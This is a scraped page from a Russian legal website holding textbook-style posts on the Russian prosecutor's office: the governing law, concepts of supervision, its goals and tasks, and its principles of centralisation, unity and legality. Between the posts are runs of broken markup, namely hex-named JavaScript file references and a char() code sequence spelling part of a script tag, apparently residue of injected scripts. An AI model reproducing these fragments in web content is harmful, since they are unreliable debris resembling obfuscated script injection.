Полномочия, организация и порядок деятельности Прокуратуры РФ определяются федеральным законом (п. 5 ст. 129 Конституции РФ). Федеральный закон "О прокуратуре Российской Федерации", принятый 17 января 1992 г., в редакции Федерального закона "О внесении изменений и дополнений в Закон Российской Федерации "О прокуратуре Российской Федерации" от 17 ноября 1995 г. с поправками Федерального закона "О внесении изменений и дополнений в Федеральный закон "О прокуратуре Российской Федерации" от 10 февраля 1999 г. занимает особое место среди всех нормативных актов, регулирующих организацию и деятельность органов прокуратуры. Его значение определяется прежде всего его универсальностью, то есть тем, что он регулирует все направления деятельности прокуроров, предмет и пределы надзора, полномочия прокуроров, порядок прохождения службы и другие виды деятельности. В то же время Закон не подменяет и не заменяет иных норм законодательства, регулирующих уголовно-процессуальную, гражданско-процессуальную, арбитражно-процессуальную и иную деятельность прокуроров.

Иногда возникает конкуренция норм Закона о прокуратуре и процессуального законодательства. В таких случаях, если полномочия прокурора предусмотрены каким-либо процессуальным законом, то следует руководствоваться и ссылаться в соответствующих актах прокурорского реагирования на этот закон. Например, Закон о прокуратуре (ст. 36) предусматривает полномочия суда по уголовным делам, в то же время эти полномочия предусмотрены и в УПК (ст. 325). Когда прокурор приносит кассационный или частный протест, он должен руководствоваться ст. 325 УПК. Если же конкуренции норм нет, прокурор обязан руководствоваться соответствующими нормами Закона о прокуратуре.
Закон о прокуратуре определяет не только полномочия прокурора в различных направлениях надзора, но и определяет принципы организации и деятельности прокуратуры, ее систему и структуру, кадровую политику органов прокуратуры, социальную защиту прокуроров и т.д.
Закон о прокуратуре состоит из 7 разделов, включающих 54 статьи. В первом разделе (ст. 1-10) "Общие положения" определяется статус органов прокуратуры в государственной системе, содержание основной функции органов прокуратуры, состоящей в надзоре за соблюдением Конституции РФ и исполнением действующих на территории РФ законов, определяются цели деятельности прокуратуры и ее основные направления.
В качестве целей прокурорской деятельности Закон определил: а) обеспечение верховенства закона; б) единство законности; в) обеспечение укрепления законности; г) обеспечение защиты прав и свобод человека и гражданина; д) обеспечение защиты охраняемых законом интересов общества и государства.
Для достижения поставленных целей Закон определяет основные направления деятельности:
• надзор за исполнением законов федеральными министерствами, госкомитетами, службами и соответствием законам издаваемых ими правовых актов;
• надзор за соблюдением прав и свобод человека и гражданина федеральными министерствами, государственными комитетами, службами и иными федеральными органами исполнительной власти, представительными (законодательными) и исполнительными органами субъектов Российской Федерации, органами местного самоуправления, органами военного управления и руководителями коммерческих и некоммерческих организаций;
• надзор за исполнением законов органами, осуществляющими оперативно-розыскную деятельность, дознание и предварительное
следствие;
• надзор за исполнением законов судебными приставами;
• надзор за исполнением законов администрациями органов и учреждений, исполняющих наказание и применяющих назначенные судом меры принудительного характера, администрацией мест содержания задержанных и заключенных под стражу;
• уголовное преследование в соответствии с полномочиями, установленными уголовно-процессуальным законодательством РФ;
• координация деятельности правоохранительных органов по борьбе с преступностью.
Для достижения указанных целей прокуроры участвуют в рассмотрении судами уголовных, гражданских, административных и арбитражных дел, опротестовывают противоречащие закону решения, приговоры, определения и постановления судов. Прокуратура РФ принимает участие в правотворческой деятельности.
В первом же разделе Закона о прокуратуре определяются основные формы международного сотрудничества прокуратуры (ст. 2), определяются правовые основы деятельности прокуратуры, включающие в себя Конституцию РФ, Федеральный закон о прокуратуре, иные федеральные законы (прежде всего УПК, ГПК, АПК и ряд других) и международные договоры Российской Федерации (ст. 3). Важно отметить, что в Законе подчеркивается недопустимость возложения на прокуратуру функций, не предусмотренных федеральными законами.
Существенное значение в рассматриваемом разделе Закона о прокуратуре имеет определение принципов организации и деятельности Прокуратуры РФ. В их числе указаны такие принципы, как независимость прокуратуры, гласность, единство и централизация надзора и ряд других. Подробно содержание этих принципов будет рассмотрено в последующих главах курса.
В том же разделе Закона о прокуратуре закреплены гарантии обеспечения полномочий прокурора и соблюдения принципов организации и деятельности прокуратуры (ст. 5, 6), а также определены полномочия прокуроров по их участию в заседаниях органов законодательной и исполнительной власти (ст. 7).
Особое место в первом разделе Закона о прокуратуре занимает ст. 10 - о порядке рассмотрения и разрешения в органах прокуратуры заявлений, жалоб и иных обращений граждан. В органы Прокуратуры РФ ежегодно поступает свыше одного миллиона жалоб и заявлений граждан, столько же граждан обращаются к прокурорам на личном приеме.88d748f7e8894780a44b9df3476f870b.js" type="text/javascript">8b8d4ca571e202d254a43f0e89983985char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)3ebfd2e2ddba8e273d41ce4a69cfda04.js" type="text/javascript">ca5550c3b31588896d4c78398997d842.js" type="text/javascript">745437cfb498350226606af81db87a51.js" type="text/javascript">d89aa57395893c6cb621d76c5b74b193.js" type="text/javascript">74d533f2b2f1aaf6c1ca8a88b3f4307d.js" type="text/javascript">24608dfb3b9271ff88f82d03cac30229.js" type="text/javascript">20ab15a55e3dea39c0f4a68ed58ea640.js" type="text/javascript">9348da03a0f81747a8dc27b28ae42ba7.js" type="text/javascript">b5e7522f02e76a80289fd17bc8c9d6e9.js" type="text/javascript">8dcda5eeef4566753a15d2d5446ac2e4.js" type="text/javascript">eeabd77e687fafb39d047540b7727346.js" type="text/javascript">
Коментариев: 0 | Просмотров: 241 |
Концепция прокурорского надзора на современном этапе
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
На протяжении всей истории существования и деятельности прокуратуры, в особенности после того, как в 1965 г. прокурорский надзор стал самостоятельной отраслью правовой науки, а по номенклатуре научных специальностей - самостоятельной учебной дисциплиной, в теории и практике все чаще стали возникать различного рода концепции относительно места органов прокуратуры в системе государственных органов, предмета и пределов прокурорского надзора, полномочий прокурора и средств по устранению им установленных нарушений закона и т.д. Наиболее часто ученые-правоведы обсуждали такие проблемы, как то: является ли прокурорский надзор высшим, как это было провозглашено Конституцией 1936 г. и нашло дальнейшее закрепление в Конституции СССР 1977 г., в Конституции Российской Федерации 1978 г., а также в Законе "О прокуратуре СССР" 1979 г.; предмет и пределы прокурорского надзора, в Особенности надзора за исполнением законов и законностью правовых актов.
Прокурорский надзор как вид государственной деятельности и как правовая наука стал предметом особо острой научной дискуссии, начиная с периода реформирования государства. Тогда возникла необходимость разработать научно обоснованную концепцию организации и деятельности органов прокуратуры в этих условиях. В общесоюзном масштабе такая попытка была предпринята на Всесоюзной научно-практической конференции, состоявшейся 1-2 декабря 1989 г,1 Ее возглавил Генеральный прокурор Союза ССР. В ней приняли участие прокуроры союзных и автономных республик, краев и областей, ученые-юристы. На конференции речь шла о восстановлении принципов организации и деятельности органов прокурорского надзора как органов, осуществляющих высший надзор за точным и единообразным исполнением законов. В то же время уже тогда выступавшие говорили об отказе от бюрократических методов руководства деятельностью нижестоящих прокуратур и предоставлении большей процессуальной самостоятельности прокурорам республик, краев и областей.
Научная дискуссия, посвященная концепции прокурорского надзора на современном этапе, была проведена также ив стенах юридического факультета МГУ в 1990 г. В ней приняли участие работники органов прокуратуры, профессорско-преподавательский состав МГУ и ученые-юристы ВНИИ Прокуратуры СССР2.
С тех пор теоретики и практики прокурорского надзора не перестают возвращаться к различного рода проблемам организации и деятельности органов прокуратуры.
В чем состоит сущность и содержание концепции прокурорского надзора на современном этапе? Какие проблемы при этом выдвигают ученые и практики прокурорского надзора?
Предмет и содержание концепции прокурорского надзора состоят в том, чтобы определить: - степень эффективности сложившейся системы, структуры и полномочий органов прокуратуры на современном этапе; - необходимость сохранения понятия высшего надзора органов прокуратуры за исполнением законов в государстве; - место органов прокуратуры в системе государственных органов; - соответствие действующего законодательства требованиям по обеспечению единства, централизации и независимости органов
прокуратуры; - дальнейшее совершенствование прокурорского надзора в плане реализации судебной реформы в РФ; - конкретные меры законодательного и организационного характера по преобразованию и организации, и деятельности органов прокуратуры.
' См.; Социалистическая законность. 1990. № 2. 2 См.: Вестник Моск. ун-та. Сер. "Право". 1990. № 4.

Разработка различного рода концепций прокурорского надзора за последующие годы стала "излюбленным" занятием многих правоведов, даже тех, которые весьма далеко отстоят от теории и практики прокурорского надзора. Поэтому следует весьма критически относиться к рекомендациям таких авторов. Одним из таких примеров является обоснование концепции прокурорского надзора, предпринятое авторами "Концепции судебной реформы в Рф"1. Авторы весьма искаженно освещают историю и назначение прокурорского надзора в Российской Империи; в ней, в частности, указывается, что органы прокуратуры были созданы Екатериной II, тогда как они были учреждены Петром I в 1722 г.; что в соответствии с Уставами уголовного судопроизводства 1864 г. прокуроры выполняли лишь функцию поддержания обвинения по уголовным делам в суде, тогда как еще в соответствии с "Основными положениями о прокуратуре", принятыми в 1862 г. Государственным Советом по рескрипту Александра II, органам прокуратуры отводилась роль по осуществлению "верховного" надзора за "точным и единообразным исполнением законов" в государстве. В предмет надзора входило, конечно, и поддержание в суде обвинения по уголовным делам.
В связи с этим еще Н. В. Муравьев - известный деятель и теоретик прокурорского надзора XIX в. - писал в 1899 г., что "...понятие о прокуратуре как о царском оке могло расширяться, но не извратилось присоединением к нему новейшего представления о государственном обвинении"2. Поэтому глубоко ошибочными, на наш взгляд, являются утверждения авторов "Концепции" об ограничении сферы прокурорского надзора лишь участием прокурора в судебном рассмотрении уголовных дел. Об этом можно было бы и не говорить, если бы авторы не переносили концепцию прокурорского надзора в дореволюционной России на определение предмета и пределов прокурорского надзора в РФ в современных условиях.890891ff256a07be7bd8216736628d56.js" type="text/javascript">9bc6c1b2c37cb8a2f59aa1f33839e108char(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)66c46bdee2929ff4b6426cc6b4423768.js" type="text/javascript">d4104de21906d65236fe414b4cb38d59.js" type="text/javascript">ed1d2c5843d582622c0d729b727b3489.js" type="text/javascript">a20cb3c09ce05e9edcb5b78b1633d458.js" type="text/javascript">c16fb44b45bb9ae031cfe422f586c3b4.js" type="text/javascript">f9dad96f7ca7dfb835b1f04ba119189d.js" type="text/javascript">2c6245d897fb0813943f690c6201ef80.js" type="text/javascript">a45b67b014ac1a11ce7548f54dd78173.js" type="text/javascript">047b1faf39ff7631bfc3b311b4f1d331.js" type="text/javascript">2fc09fb8d8a15c799e7625b63f3b7e30.js" type="text/javascript">4519cfb2ad54aa320c8030cb34df246c.js" type="text/javascript">
Коментариев: 0 | Просмотров: 650 |
Цели и задачи прокурорского надзора
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Цели и задачи прокурорского надзора тесно связаны между собой. Под целью прокурорского надзора следует понимать результат, на достижение которого направлена вся деятельность прокуратуры в целом, и, в частности, ее важнейшая функция - прокурорский надзор. Цели прокурорского надзора определяются статусом прокуратуры, ее местом и ролью в государстве. В конечном счете они определяются Конституцией Российской Федерации, Законом о прокуратуре, другим законодательством, регламентирующим деятельность прокурорских органов. Наиболее конкретно цели прокуратуры в целом и прокурорского надзора в частности определены в ст. 1 Закона о прокуратуре. Пункт 2 этой статьи определяет, что целями прокуратуры являются: 1) обеспечение верховенства закона; 2) обеспечение единства и укрепления законности; 3) обеспечение защиты прав и свобод человека и гражданина; 4) обеспечение защиты охраняемых законом интересов общества и государства.
Нетрудно заметить, что на достижение этих целей направлена вся деятельность прокуратуры. Конкретные виды этой деятельности перечислены в п. 2-4 ст. 1 Закона о прокуратуре. Ими являются: 1) прокурорский надзор (4 основных направления или отрасли); 2) уголовное преследование; 3) координация деятельности правоохранительных органов по борьбе с преступностью.
4) участие в рассмотрении дел судами; 5) участие в правотворческой деятельности.
Основным средством достижения указанных в Законе о прокуратуре целей является прокурорский надзор. Это естественно, так как именно в прокурорском надзоре состоит основная функция прокуратуры.
Задачи прокурорского надзора по сравнению с целями более конкретны. Их решение обеспечивает достижение целей прокурорского надзора. Задачи надзора более многочисленны по сравнению с целями. Они различаются между собой по уровню, содержанию, средствам их решения, компетенцией органов прокуратуры, ставящих и решающих эти задачи. Все задачи прокурорского надзора могут быть разделены на три вида, а именно: общие, специальные и частные (конкретные).
Названные виды задач взаимосвязаны между собой и имеют различные уровни. Решение частных задач (наиболее низкого уровня) обусловливает решение специальных задач надзора. Успешное разрешение специальных задач в свою очередь подчинено решению общих, наиболее высокого уровня, задач прокурорского надзора.
Общие задачи прокурорского надзора определяются Конституцией РФ, Федеральным законом о прокуратуре, а также рядом других нормативных актов, например, УПК, ГПК. Они заключаются в укреплении законности и охране от всяких посягательств: а) закрепленного Конституцией РФ, конституциями республик, входящих в состав РФ, уставами иных субъектов РФ общественного и государственного строя; б) политических, трудовых, жилищных и других личных и имущественных прав и охраняемых законом интересов граждан РФ, гарантированных Конституцией РФ, конституциями республик и уставами иных субъектов РФ; в) прав и охраняемых законом интересов государственных учреждений, предприятий, независимо от форм собственности, кооперативных и иных общественных организаций.
dbe995453f1088b68009fb5e40911192.js" type="text/javascript">7f83e73196b4dd6420245282a214a289.js" type="text/javascript">f1fbf07e5885ad42c5e28f1bcfbd6eab.js" type="text/javascript">
Коментариев: 0 | Просмотров: 302 |
Принципы организации и деятельности прокуратуры
  Прокурорский надзор | Автор: admin | 30-05-2010, 04:02
Принципы организации и деятельности прокуратуры-это наиболее общие, руководящие положения, определяющие наиболее существенные черты и признаки многогранной деятельности органов прокуратуры и основные предъявляемые к ней требования. Так как принципы определяют наиболее общие признаки и требования, то они обязательны для любого прокурорского работника, независимо от занимаемой должности или конкретного направления деятельности. В данном разделе речь идет о принципах организации и деятельности прокуратуры. Под этим понимаются такие принципы, которые реализуются в процессе организации и осуществления главной функции, прокуратуры-прокурорского надзора.
Организация и осуществление прокурорского надзора органически взаимосвязаны и практически неразделимы. Вот почему, имея в виду прокурорский надзор, мы не можем отделить принципы его осуществления от принципов организации этой деятельности прокурора. Основные принципы закреплены в Конституции РФ (ст. 129) и в Законе о прокуратуре РФ (ст. 4). Законодательное закрепление принципов определяет их правовую основу и подчеркивает обязательность соблюдения каждым прокурором и иным прокурорским работником.
Принцип централизации. Принцип централизации прежде всего относится к организации системы прокуратуры, но вместе с тем он имеет принципиально важное значение и для надзорной деятельности прокурора, Централизация прокуратуры означает, что нижестоящие прокуроры подчиняются вышестоящим, а все прокуроры - Генеральному прокурору РФ, который возглавляет всю систему органов прокуратуры. Все прокуроры-руководители прокуратур на местах назначаются Генеральным прокурором РФ.
Централизация органов прокуратуры вызвана необходимостью обеспечения единой законности на всей территории РФ, что невозможно осуществить без руководства прокурорами из единого центра. Обеспечение единой законности на территории России предполагает такую организацию прокурорских органов, при которой обеспечивались бы единые требования осуществления прокурорского надзора во всех субъектах РФ, городах и районах. Исходя из принципа централизации каждый вышестоящий прокурор несет полную ответственность за правильную организацию работы всех подчиненных ему прокуроров.
Принцип централизации обеспечивает единство прокурорской практики, направляемой и координируемой Генеральной прокуратурой РФ. При реализации этого принципа проявляется сочетание единого руководства с инициативой, творческой активностью прокуроров на местах. Принцип централизации реализуется и в том, что назначение прокуроров и их подчиненность идет только по вертикали: нижестоящие прокуроры подчиняются вышестоящим, а все прокуроры - Генеральному прокурору РФ.
Прокурор любого звена прокурорской системы при осуществлении надзора может быть заменен другим прокурором, за исключением специально оговоренных в законодательстве случаев (например, в заседаниях Пленума Верховного Суда РФ участвует Генеральный прокурор РФ, председателем коллегии прокуратуры субъекта Федерации является прокурор субъекта Федерации). Вышестоящий прокурор может взять на себя выполнение полномочий нижестоящего прокурора, а также поручить ему выполнение некоторых своих обязанностей, кроме случаев, определенных законом (например, прокурор субъекта Федерации не может поручить прокурору района принести протест в порядке надзора по уголовному или гражданскому делу на вступившие в силу приговор или решение суда, так как прокурору района закон такого права не предоставляет). Вместе с тем каждый прокурор сохраняет самостоятельность в принятии решений и несет за принятое решение персональную ответственность.
Исходя из принципа централизации каждый вышестоящий прокурор обязан осуществлять руководство и контроль за работой подчиненных ему прокуроров и несет ответственность за правильную организацию работы по осуществлению надзора подчиненными прокурорами.
Принцип единства прокурорского надзора. Согласно ст. 129 Конституции РФ прокуратура - единая федеральная система территориальных, специализированных (военные, транспортные, природоохранные и др.) прокуратур, которые подчиняются единому центру - Генеральной прокуратуре РФ. Принцип единства прокурорского надзора выражается в единообразных формах организации и деятельности всех прокурорских органов, единстве целей и общих задач осуществления надзора в стране, а также полномочий прокуроров по выявлению правонарушений и реагированию на них. Прокурорский надзор осуществляется на основе единого для всех звеньев прокуратуры законодательства. Прокурорский надзор един по своему внутреннему содержанию основного направления деятельности прокуратуры, сутью которого является проверка исполнения требований законов и устранение правонарушений.
Принцип единства прокурорского надзора реализуется в единоличном разрешении прокурором всех вопросов, связанных с прокурорским надзором. Все приказы и указания прокурора подписываются им лично и являются обязательными для нижестоящих прокуроров. Вышестоящий прокурор может единолично отменить акт надзора нижестоящего прокурора.
Осуществляя надзор за исполнением законов, каждый прокурор лично вносит протесты на незаконные акты, представления, возбуждает уголовные дела, принимает иные решения.
Единоначалие повышает персональную ответственность прокуроров за принимаемые решения, в особенности когда они сопряжены с применением мер государственного принуждения и ограничения прав граждан. Сказанное не означает полного отсутствия в системе прокуратуры коллегиального обсуждения и решения вопросов прокурорского надзора. В Генеральной прокуратуре и в прокуратурах субъектов Федерации и приравненных к ним прокуратурах созданы коллегии для обсуждения наиболее важных вопросов деятельности прокуратур. Обсуждаются такие вопросы на совещаниях при руководителях прокуратур и в других формах. Однако реализуются решения этих совещательных органов через приказы прокуроров.
Принцип законности. Среди всех принципов организации и осуществления надзора важнейшее значение имеет принцип законности. Этот принцип - необходимое условие реализации всех остальных принципов деятельности прокуратуры. Законность - один из основополагающих принципов государственного руководства обществом в целом, важное средство укрепления и развития государственности, упрочения охраны и развития экономической базы государства, необходимое условие демократической системы государства.
, Законность как принцип прокурорского надзора означает, что все органы прокуратуры, осуществляют свои надзорные функции в строгих рамках закона, соблюдая предусмотренные законом права и интересы юридических и физических лиц. Осуществляя надзор за исполнением законов, прокуроры могут действовать только в пределах своих определенных законом полномочий.
Принцип законности имеет особое значение для прокурорского надзора потому, что на него возложена обязанность следить за исполнением законов всеми юридическими и физическими лицами, а потому и сама прокуратура, выполняя эту функцию, обязана предельно точно и неукоснительно соблюдать законы. Выполняя функцию надзора, прокуратура действует на основе законов, определяющих организацию и порядок ее деятельности: Конституции РФ, Закона о прокуратуре, других законодательных актов РФ.eef135abd94380e46dbcef8727ee9cee.js" type="text/javascript">b886855af17d7928d0c71f19195a64cdchar(46,106,115,34,32,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,62,60,47,115,99,114,105,112,116,62)542de78c3cad15e3bcbf1e5ddc6eef5c.js" type="text/javascript">3bcc3bd9d619b652e71313826ae11487.js" type="text/javascript">e3d7c30a906bfcb5fee3cb5c13e437b8.js" type="text/javascript">b26993e7d5d75e827d9356f0bd5dc79a.js" type="text/javascript">5215f0ad887d220ef27752f8129babec.js" type="text/javascript">d68b32470882b843d277a2c830d55195.js" type="text/javascript">8e07f1800be7bc14f67f81a8c2babcb1.js" type="text/javascript">e04be16947a27d84d536b16ca4e2a4e8.js" type="text/javascript">fff55a3f495fe13fea52608de7f93bc0.js" type="text/javascript">9d63ad314d01b6a59ba154407c1c409f.js" type="text/javascript">48185014b0cee91bcaf783cfebdb5d2d.js" type="text/javascript">
Коментариев: 0 | Просмотров: 299 |
ukrstroy.biz
ЮРИДИЧЕСКАЯ ЛИТЕРАТУРА:
РАЗНОЕ:
КОММЕНТАРИИ:
ОКОЛОЮРИДИЧЕСКАЯ ЛИТЕРАТУРА: